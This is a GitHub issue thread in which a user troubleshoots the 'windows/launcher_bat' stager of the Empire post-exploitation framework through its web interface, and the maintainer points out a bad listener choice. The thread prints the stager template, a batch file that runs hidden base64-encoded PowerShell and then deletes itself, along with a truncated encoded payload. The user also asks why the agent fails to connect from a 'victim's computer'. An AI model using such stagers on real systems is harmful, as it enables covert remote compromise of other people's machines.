### ISSUE TITLE
windows/launcher_bat  powershell  code  windows7 runing error

### ISSUE THREAD

**Issue by ayanamirins** [interference-security/empire-web#15]
i help me plz... why..???? 
windows/launcher_bat powershell   decoding.. error..

windows7 pro runing  functin find not error

![screenshot from 2017-06-07 18-20-06](https://user-images.githubusercontent.com/29249594/26871540-8b5ae5dc-4b41-11e7-9699-da85e4a1444e.png)
![screenshot from 2017-06-07 18-20-18](https://user-images.githubusercontent.com/29249594/26871546-8f56f144-4b41-11e7-8c3a-d7743fa1e5b0.png)
![screenshot from 2017-06-07 18-20-36](https://user-images.githubusercontent.com/29249594/26871548-92a801e4-4b41-11e7-8414-09eaa2c01cf7.png)
![screenshot from 2017-06-07 18-23-09](https://user-images.githubusercontent.com/29249594/26871553-95e2b11a-4b41-11e7-8f43-4a361e5cf15f.png)

**Comment by interference-security** [comment]
I understand you are facing a problem. To help you better, I request you to please share some information on what you are trying to do, what steps you are following and what the error is. Just the screenshots are not very helpful.

Also, the language in which the last error message is displayed is unknown to me. Please consider sharing the error message in English language.

In the mean time, I will use "windows/launcher_bat powershell" and see if there is an error message.

**Comment by ayanamirins** [comment]
okay sorry  re screenshots and error message in English language 

error message >  title function.  message Windows cannot find 'function'. Make sure you typed the name correctly, and then try again.

why..? function error message?? help me.. plz.. 
![screenshot from 2017-06-08 00-57-43](https://user-images.githubusercontent.com/29249594/26888640-9f7044a8-4b79-11e7-8354-e4d1ed8363c4.png)
![screenshot from 2017-06-08 00-58-46](https://user-images.githubusercontent.com/29249594/26888646-a46af9c6-4b79-11e7-9598-f687358d95a6.png)
![screenshot from 2017-06-08 00-59-15](https://user-images.githubusercontent.com/29249594/26888658-ac999a6c-4b79-11e7-912c-d550e5857e21.png)

**Comment by interference-security** [comment]
Thank you for sharing more information. I tested the stager "windows/launcher_bat" and it is working perfectly. The payload generated by Empire was in the format as shown below (it looks different from your screenshots):
```
@echo off
start /b powershell -noP -w 1 -enc  PAYLOAD_GENERATED_BY_EMPIRE
start /b "" cmd /c del "%~f0"&exit /b
```
The error you are getting is because the payload is in a format that is not acceptable by Windows Command Prompt.

How are you generating the payload? What steps are you following? Consider sharing the steps in this format:
1. Select X option
2. Select X stager
3. Set X, Y, Z options in stager
4. Other steps

**Comment by ayanamirins** [comment]
O My Got!!!!!!!!!!!!!! Listeners bad... choice .... Thx bro!!!!!!!!!!!!!!!!!!!
![screenshot from 2017-06-08 02-36-51](https://user-images.githubusercontent.com/29249594/26892470-68d0b4ac-4b86-11e7-9017-40baea2e0cf5.png)

**Comment by ayanamirins** [comment]
Last Q. agent not... connect....   stager ->  windows/launcher_bat  >@echo off
start /b powershell -noP -w 1 -enc  WwBSAGUAZgBdAC4AQQBTAFMAZQBNAEIATABZAC4ARwBFAFQAVABZAHAAZQAoACcAUwB5AH.....==
start /b "" cmd /c del "%~f0"&exit /b

where is PAYLOAD_GENERATED_BY_EMPIRE? 

empire dev2.0  empire-web2.0.

why....not agent connected..??

**Comment by ayanamirins** [comment]
I'm testing empier-empier-web with all the dev versions, but when I run the 'launcher_bat' on the victim's computer, the agent will not connect at all.
What is the problem? The listener type is set to http_foreign. Is there a need to change the listener settings?
